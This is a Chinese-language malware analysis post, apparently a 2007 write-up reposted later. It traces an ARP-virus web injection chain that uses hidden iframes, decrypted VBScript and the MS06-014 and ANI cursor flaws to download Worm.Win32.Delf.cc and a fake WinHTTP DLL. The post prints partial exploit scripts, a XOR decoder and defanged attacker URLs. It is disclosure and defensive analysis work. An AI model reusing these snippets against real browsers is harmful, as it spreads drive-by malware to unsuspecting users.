ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等

ゝ一世哀愁。 2024-02-17 13:57 18阅读 0赞

**endurer** 原创  
2007-05-24 第**1**版

ARP病毒自动加入的网址为：  
/---  
＜script language＝javascript src＝hxxp:／／google\*\*.17\*\*\*173\*\*8.org／ad\*\*\*.js＞＜／script＞  
\---/

ad\*\*\*.js 包含代码：  
/---  
document.write（'＜iframe width＝0 height＝0 src＝"hxxp:／／google\*\*.17\*\*\*173\*\*8.org／p\*d\*\*\*.htm"＞＜／iframe＞'）;  
\---/

p\*d\*\*\*.htm 首先引入文件jscode.js，其内容是使用eval（）执行自定义函数，从而产生自定义函数utf8to16（）、xxtea\_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

t 的值解密后为VBScript脚本：  
/---  
＜script language＝VBScript＞  
on error resume next  
Set downf ＝ document.createElement（"object"）  
downf.setAttribute "classid", "clsid:BD9"＆"6C556－6"＆"5A3－11D"＆"0－983A－00C"＆"04FC2"＆"9E36"  
str＝"Microsoft.XMLHTTP"  
Set O ＝ downf.CreateObject（str,""）  
if Not Err.Number ＝ 0 then  
err.clear  
'msgbox "没有0614漏洞,页面转到ms07004EXP!"  
document.write（"＜iframe width＝""0"" height＝""0"" src＝""ms07017.htm""＞＜／iframe＞"）  
else  
'msgbox "存在0614漏洞,页面转到MS0614的EXP!"  
document.write（"＜iframe width＝""0"" height＝""0"" src＝""06014.htm""＞＜／iframe＞"）  
end if  
＜／script＞  
\---/

ms07017.htm 与 p\*d\*\*\*.htm 相似，首先引入文件jscode.js，其内容是使用eval（）执行自定义函数，从而产生自定义函数utf8to16（）、xxtea\_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

解密后的t值为JavaScript脚本，功能是如果cookie变量“MTV”不存在，则创建，并输出sscape（）编码的代码：  
/---  
＜script src＝"ani.js"＞＜／script＞  
\---/

ani.js的内容为JavaScript脚本，包含代码：  
/---  
document.writeln（“＜DIV style＝/“CURSOR: url（hxxp:/／/／google\*\*.17\*\*\*173\*\*8.org/／ani.jpg）/”＞＜/／DIV＞＜/／DIV＞＜/／BODY＞＜/／HTML＞”）;  
\---/

ani.jpg利用 ANI漏洞下载 update.exe

文件说明符 : D:/test/update.exe  
属性 : A---  
获取文件版本信息大小失败!  
创建时间 : 2007-5-23 12:13:25  
修改时间 : 2007-5-23 12:13:26  
访问时间 : 2007-5-23 0:0:0  
大小 : 36435 字节 35.595 KB  
MD5 : e32966b40d3e655f1912b2cd6930b24b

Kaspersky 报为 **Worm.Win32.Delf.cc**，瑞星报为 **Trojan.Mnless.lxp**

06014.htm包含javascript代码，功能是使用自定义函数utf8to16（）、xxtea\_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

t 的值解密后为VBScript脚本，功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载rss.dll，保存为%windir%/WinHttp.dll，下载update.exe，保存为%windir%/KB726255.log，

创建WScript.Shell，在注册表HKLM/SOFTWARE/Classes/CLSID/\{36CD708B－6077－4C02－9377－D73EAA495A0F\}下创建键HTTP Execute Hooks和一些值。

其中部分代码需要使用自定义函数  
/---  
Function NC（x）  
For i＝1 to Len（x） Step 2  
NC＝NC ＆ Chr（CLng（"＆H" ＆ Mid（x,i,2）） Xor 23）  
Next  
End Function  
\---/

来解密。

文件说明符 : D:/test/rss.dll  
属性 : A---  
语言 : 中文（中国）  
文件版本 : 6.00  
说明 : Windows HTTPMon Dll  
版权 : （C） Microsoft Corporation. All rights reserved.  
备注 :  
产品版本 : 6.00  
产品名称 : Microsoft（R） Windows（R） Operating System  
公司名称 : Microsoft Corporation  
合法商标 :  
内部名称 : WINHTTP  
源文件名 : WINHTTP.DLL  
创建时间 : 2007-5-24 13:57:51  
修改时间 : 2007-5-24 13:57:54  
访问时间 : 2007-5-24 0:0:0  
大小 : 5120 字节 5.0 KB  
MD5 : 5164bccd2a40d9ac9bf83453c171c720